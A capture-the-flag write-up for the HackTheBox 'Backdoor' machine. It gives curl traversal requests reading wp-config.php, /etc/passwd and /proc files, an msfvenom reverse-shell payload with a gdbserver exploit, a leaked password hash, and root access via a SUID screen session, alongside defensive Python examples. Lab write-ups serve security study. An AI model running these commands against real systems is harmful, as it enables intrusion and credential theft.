0x1 Recon
Nmap
nmap -sC -sV -T4 -p- backdoor.htb
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b4:de:43:38:46:57:db:4c:21:3b:69:f3:db:3c:62:88 (RSA)
| 256 aa:c9:fc:21:0f:3e:f4:ec:6b:35:70:26:22:53:ef:66 (ECDSA)
|_ 256 d2:8b:e4:ec:07:61:aa:ca:f8:ec:1c:f8:8c:c1:f6:e1 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-generator: WordPress 5.8.1
|_http-title: Backdoor – Real-Life
1337/tcp open waste?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Manual
Port 1337 is open and that's unusual. I know it's a common port for malicious backdoors, so I first decided to explore that route. I tried to connect to it with netcat.
nc backdoor.htb 1337
A TCP connection is created but I don't get a shell. I wasted a long time on that port and tried various things including socat, telnet and sending HTTP requests, but never got any response.
0x2 Enum
The HTTP server runs WordPress, so I launched wpscan with user enumeration.
wpscan --url backdoor.htb -e u
A few vulnerabilities were found but nothing that could lead to a foothold. It discovered the default user 'admin'.
From there I did a gobuster enumeration but didn't find anything other than the usual WordPress stuff. I also tried brute-forcing the admin password on the wp-login.php page, but in vain.
I got stuck at this stage and decided to get a small hint from HTB's forum. Someone wrote "don't forget to enumerate plugins". Wpscan did that enumeration but didn't find anything; my mistake was to trust wpscan too much and not to enumerate them manually.
So I access http://backdoor.htb/wp-content/plugins and find one named "Ebook-download".
Google informs me there is a Directory Traversal vulnerability (https://www.exploit-db.com/exploits/39575), so let's find interesting files.
I started by fetching wp-config.php.
curl http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
I got the database details including the password. I tried that password to log in as admin on WordPress but it didn't work.
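As an added example (not the plugin's code and not part of this write-up), here is the containment check that the ebook-download plugin's filedownload.php is missing, in Python: the requested name is decoded once, canonicalised, and refused unless it resolves strictly below the directory meant to be served. The plugin root and the 'ebooks' subdirectory are assumed names; the sample values are the two traversal payloads used in this write-up plus an encoded variant, an absolute path and two benign names.

```python
"""Hardened path resolution for a file-download endpoint (added example)."""
import os
from urllib.parse import unquote

# Assumed layout for the example: the plugin directory is the one on the
# target, the 'ebooks' subfolder is a constructed name for the served files.
PLUGIN_ROOT = "/var/www/html/wp-content/plugins/ebook-download"
EBOOK_DIR = os.path.join(PLUGIN_ROOT, "ebooks")


def resolve_download_path(base_dir, requested):
    """Return the absolute file path to serve, or None if the request must be refused.

    Steps: decode the query value once, reject empty names and NUL bytes
    (which truncate C filenames), resolve '..' segments and symlinks with
    realpath, then verify the result is a strict descendant of base_dir.
    """
    name = unquote(requested)
    if name == "" or "\x00" in name:
        return None
    base = os.path.realpath(base_dir)
    # os.path.join discards base_dir when 'name' is absolute, so a request
    # such as "/etc/passwd" is caught by the containment test below as well.
    candidate = os.path.realpath(os.path.join(base, name))
    if candidate == base or os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def classify_requests(values, base_dir=EBOOK_DIR):
    """Map each raw ebookdownloadurl value to 'serve' or 'refuse' for review."""
    return {v: ("serve" if resolve_download_path(base_dir, v) else "refuse")
            for v in values}


if __name__ == "__main__":
    # The two payloads from the write-up, an encoded variant, an absolute
    # path and two benign names (all constructed inputs).
    samples = [
        "../../../wp-config.php",
        "../../../../../../etc/passwd",
        "%2e%2e/%2e%2e/%2e%2e/wp-config.php",
        "/etc/passwd",
        "guide.pdf",
        "2021/../guide.pdf",
    ]
    for value, verdict in classify_requests(samples).items():
        print(f"{verdict:7} {value}")
```

The check compares canonical paths rather than looking for the substring "..", so encoded dots, a benign "sub/../file" inside the served directory, and symlinks that point outside it are all handled by the same test.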
Then I looked for the passwd file.
curl http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../etc/passwd
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
user:x:1000:1000:user:/home/user:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:113:118:MySQL Server,,,:/nonexistent:/bin/false
I discover the user 'user'. I tried ssh user@backdoor.htb with the db password found earlier, but no luck.
I looked for various important files but nothing useful. My goal was to find out which process is running on port 1337. I had no idea how to get that information without command execution, so I did some research and found this blog post: https://www.netspi.com/blog/technical/web-application-penetration-testing/directory-traversal-file-inclusion-proc-file-system/
I discover that /proc/[PID]/cmdline "Lists everything that was used to invoke the process. This sometimes contains useful paths to configuration files as well as usernames and passwords."
I thought I'd probably have to write a Python script to brute-force the PID and get the cmdline for each of them. But another part of the blog post is interesting:
/proc/sched_debug
This is usually enabled on newer systems, such as RHEL 6. It provides information as to what process is running on which cpu. This can be handy to get a list of processes and their PID number.
Let's start with that.
curl http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../proc/sched_debug
I got a long list of processes running on the machine with their names and PIDs. Here's just a small part of it:
runnable tasks:
S task PID tree-key switches prio wait-time sum-exec sum-sleep
-----------------------------------------------------------------------------------------------------------
S systemd-logind 767 189.972794 4009 120 0.000000 386.163280 0.000000 0 0 /autogroup-44
S cron 797 485.874123 1045 120 0.000000 132.391170 0.000000 0 0 /autogroup-54
S sh 820 442629.902892 118176 120 0.000000 21593.906290 0.000000 0 0 /autogroup-59
S sh 822 361.020061 76 120 0.000000 11.597600 0.000000 0 0 /autogroup-60
S apache2 855 469799.565655 59517 120 0.000000 3773.929180 0.000000 0 0 /autogroup-69
S systemd 883 25.103698 100 120 0.000000 66.041240 0.000000 0 0 /autogroup-76
S mysqld 926 194474.374286 192006 120 0.000000 10091.735710 0.000000 0 0 /autogroup-80
S ib_io_wr-2 1021 201005.565186 116672 120 0.000000 1686.664770 0.000000 0 0 /autogroup-80
S ib_io_wr-3 1022 201005.585556 116833 120 0.000000 1678.516080 0.000000 0 0 /autogroup-80
S ib_pg_flush_co 1024 201005.543436 60566 120 0.000000 3418.442960 0.000000 0 0 /autogroup-80
Sib_log_fl_notif 1026 201010.526146 565523 120 0.000000 9178.052940 0.000000 0 0 /autogroup-80
S ib_log_flush 1027 201010.529966 567862 120 0.000000 11888.349240 0.000000 0 0 /autogroup-80
Sib_log_wr_notif 1028 201010.516296 564189 120 0.000000 9021.420950 0.000000 0 0 /autogroup-80
S ib_log_writer 1029 201010.512936 565720 120 0.000000 9556.185570 0.000000 0 0 /autogroup-80
S ib_srv_lock_to 1034 201005.611896 58999 120 0.000000 1784.936210 0.000000 0 0 /autogroup-80
S ib_srv_mon 1036 201005.592456 11686 120 0.000000 262.459990 0.000000 0 0 /autogroup-80
t true 104782 10.864866 4 120 0.000000 1.002930 0.000000 0 0 /autogroup-208
S apache2 126766 469789.009115 24 120 0.000000 15.437790 0.000000 0 0 /autogroup-69
S apache2 126767 469787.769045 20 120 0.000000 8.487440 0.000000 0 0 /autogroup-69
>R apache2 126768 469793.893875 16 120 0.000000 9.355570 0.000000 0 0 /autogroup-69
S upowerd 157537 47.591914 72 120 0.000000 55.223480 0.000000 0 0 /autogroup-252
S gmain 157539 8.393746 1 120 0.000000 0.135740 0.000000 0 0 /autogroup-252
In the long list, I noticed two sh processes and I was thinking that if it's a reverse shell of some sort that runs on port 1337, it's potentially running via sh. So I got the PIDs of these two processes and fetched their cmdline.
curl http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../proc/822/cmdline --output -
One of them returned :
while true;do su user -c "cd /home/user;gdbserver --once 0.0.0.0:1337
That's how I discovered the gdbserver running on port 1337.
I guess the intended way to find that information was via PID brute-force, either with Burp or with a Python script. That would have been my next step. I just got lucky with sh.
Then a quick search tells me there is a gdbserver exploit: https://www.exploit-db.com/exploits/50539
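Every one of the requests above leaves its full query string in Apache's access log, so the same traversal is visible to a defender without the plugin being patched first. As an added example that is not part of this write-up, here is a small detector over constructed access-log lines modelled on those requests: it parses the combined log format, decodes ebookdownloadurl, and flags values that climb out of the plugin directory or point into /proc. The client address 10.10.14.5 and the timestamps are made up.

```python
"""Detecting directory-traversal requests in Apache access logs (added example)."""
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache combined log format up to the response size; referer and agent are left unmatched.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)

PLUGIN_SCRIPT = "/wp-content/plugins/ebook-download/filedownload.php"

# Constructed log lines modelled on the requests in the write-up.
LOG_LINES = [
    f'10.10.14.5 - - [20/Nov/2021:10:01:12 +0000] "GET {PLUGIN_SCRIPT}?ebookdownloadurl=../../../wp-config.php HTTP/1.1" 200 3280 "-" "curl/7.74.0"',
    f'10.10.14.5 - - [20/Nov/2021:10:02:40 +0000] "GET {PLUGIN_SCRIPT}?ebookdownloadurl=../../../../../../etc/passwd HTTP/1.1" 200 1865 "-" "curl/7.74.0"',
    f'10.10.14.5 - - [20/Nov/2021:10:15:03 +0000] "GET {PLUGIN_SCRIPT}?ebookdownloadurl=../../../../../../proc/822/cmdline HTTP/1.1" 200 96 "-" "curl/7.74.0"',
    f'10.10.14.5 - - [20/Nov/2021:10:15:30 +0000] "GET {PLUGIN_SCRIPT}?ebookdownloadurl=%2e%2e%2f%2e%2e%2fwp-config.php HTTP/1.1" 200 3280 "-" "curl/7.74.0"',
    f'192.168.1.20 - - [20/Nov/2021:10:20:00 +0000] "GET {PLUGIN_SCRIPT}?ebookdownloadurl=guide.pdf HTTP/1.1" 200 51200 "http://backdoor.htb/" "Mozilla/5.0"',
    '192.168.1.21 - - [20/Nov/2021:10:21:00 +0000] "GET /wp-login.php HTTP/1.1" 200 6123 "-" "Mozilla/5.0"',
]


def classify_value(value):
    """Normalise one ebookdownloadurl value.

    Returns (decoded, climbs, absolute, proc_read): how many '..' levels the
    path climbs before any real component, whether it is absolute, and whether
    the first real component is 'proc'.
    """
    decoded = unquote(value)  # parse_qs decoded once already; this catches double encoding
    norm = posixpath.normpath(decoded)
    segments = norm.split("/")
    climbs = 0
    for seg in segments:
        if seg != "..":
            break
        climbs += 1
    real = [s for s in segments if s not in ("..", ".", "")]
    return decoded, climbs, norm.startswith("/"), real[:1] == ["proc"]


def analyse_line(line):
    """Return a finding dict for a traversal attempt, or None for a benign line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not url.path.endswith("/filedownload.php"):
        return None
    for value in parse_qs(url.query).get("ebookdownloadurl", []):
        decoded, climbs, absolute, proc_read = classify_value(value)
        if climbs or absolute:
            return {
                "client": m.group("client"),
                "time": m.group("time"),
                "status": int(m.group("status")),
                "requested": decoded,
                "climbs": climbs,
                "proc_read": proc_read,
            }
    return None


def find_traversal_attempts(lines):
    """All findings, in log order."""
    return [f for f in map(analyse_line, lines) if f]


def clients_by_attempts(findings):
    """Count findings per client address, the usual pivot for an alert."""
    counts = {}
    for f in findings:
        counts[f["client"]] = counts.get(f["client"], 0) + 1
    return counts


if __name__ == "__main__":
    hits = find_traversal_attempts(LOG_LINES)
    for h in hits:
        flag = " (proc read)" if h["proc_read"] else ""
        print(f'{h["time"]} {h["client"]} climbs={h["climbs"]} {h["requested"]}{flag}')
    print(clients_by_attempts(hits))
```

A 200 status on these lines is the signal that matters: the plugin served the file, so wp-config.php (and with it the database password) should be treated as exposed and rotated.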
0x3 Exploit
This step is pretty straightforward; everything is clearly explained in the exploit. I created a reverse shell:
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.100 LPORT=4444 PrependFork=true -o rev.bin
set up a nc listener on port 4444 and ran the exploit:
python3 exploit.py 10.10.11.125:1337 rev.bin
I get a shell as 'user' and get the user.txt flag.
0x4 PrivEsc
I did a manual enumeration of various things. I also got the password hash of the admin user of the WordPress site: $P$Bt8c3ivanSGd2TFcm3HV/9ezXPueg5. Maybe I could try to crack it with hashcat later.
The interesting thing was the SUID binaries that I found via find / -perm -u=s -type f 2>/dev/null
Here's the list:
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/at
/usr/bin/su
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/fusermount
/usr/bin/screen
/usr/bin/umount
/usr/bin/mount
/usr/bin/chsh
/usr/bin/pkexec
screen is unusual.
I tried listing the screen sessions with screen -ls but it didn't give me anything. I did some research and found out that the SUID bit is set on screen when you want to make it multiuser. It means that one user can attach to the session of another user. So let's try to attach to a root screen session with screen -x root/
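Spotting screen in that list by eye works once; on a fleet you want the comparison automated. As an added example that is not part of this write-up, here is the same find extended with -printf so each line carries mode, owner and path, fed into a small audit that flags setuid files missing from a baseline, writable by group or others, or living outside the system binary directories. The baseline is a constructed stand-in (the write-up's own list with screen removed); in practice it would come from a clean reference install. The find output is constructed too, with one extra made-up entry under /tmp to exercise the other checks.

```python
"""Auditing SUID binaries against a baseline (added example)."""
import stat

# Constructed baseline: what a clean reference install of this image is
# expected to carry. Here it is the write-up's list minus /usr/bin/screen.
BASELINE = {
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/eject/dmcrypt-get-device",
    "/usr/lib/policykit-1/polkit-agent-helper-1",
    "/usr/lib/openssh/ssh-keysign",
    "/usr/bin/passwd", "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/at",
    "/usr/bin/su", "/usr/bin/sudo", "/usr/bin/newgrp", "/usr/bin/fusermount",
    "/usr/bin/umount", "/usr/bin/mount", "/usr/bin/chsh", "/usr/bin/pkexec",
}

SYSTEM_DIRS = ("/usr/bin/", "/usr/sbin/", "/usr/lib/", "/bin/", "/sbin/")

# Constructed stand-in for:
#   find / -perm -u=s -type f -printf '%m %u %p\n' 2>/dev/null
# Modes are made up to look like a stock install; /tmp/.cache/helper is a
# fabricated entry added to show the writability and location checks.
FIND_OUTPUT = """\
4754 root /usr/lib/dbus-1.0/dbus-daemon-launch-helper
4755 root /usr/lib/eject/dmcrypt-get-device
4755 root /usr/lib/policykit-1/polkit-agent-helper-1
4755 root /usr/lib/openssh/ssh-keysign
4755 root /usr/bin/passwd
4755 root /usr/bin/chfn
4755 root /usr/bin/gpasswd
4755 root /usr/bin/at
4755 root /usr/bin/su
4755 root /usr/bin/sudo
4755 root /usr/bin/newgrp
4755 root /usr/bin/fusermount
4755 root /usr/bin/screen
4755 root /usr/bin/umount
4755 root /usr/bin/mount
4755 root /usr/bin/chsh
4755 root /usr/bin/pkexec
4777 root /tmp/.cache/helper
"""


def parse_find_output(text):
    """Turn '%m %u %p' lines into dicts with an integer mode."""
    entries = []
    for line in text.splitlines():
        if not line.strip():
            continue
        mode_s, owner, path = line.split(maxsplit=2)
        entries.append({"mode": int(mode_s, 8), "owner": owner, "path": path})
    return entries


def audit_suid(entries, baseline=BASELINE):
    """Return (path, reason) findings; a path can appear more than once."""
    findings = []
    for e in entries:
        path, mode = e["path"], e["mode"]
        if path not in baseline:
            findings.append((path, "not in baseline"))
        if mode & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append((path, "setuid file is group- or world-writable"))
        if not path.startswith(SYSTEM_DIRS):
            findings.append((path, "setuid file outside system binary directories"))
    return findings


if __name__ == "__main__":
    for path, reason in audit_suid(parse_find_output(FIND_OUTPUT)):
        print(f"{path}: {reason}")
```

A baseline diff is what surfaces screen here: its mode and location look like every other entry, and only the comparison against a known-good host says it should not be setuid on this box.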
It worked. I got a root shell and captured the root.txt flag.
-l1ge.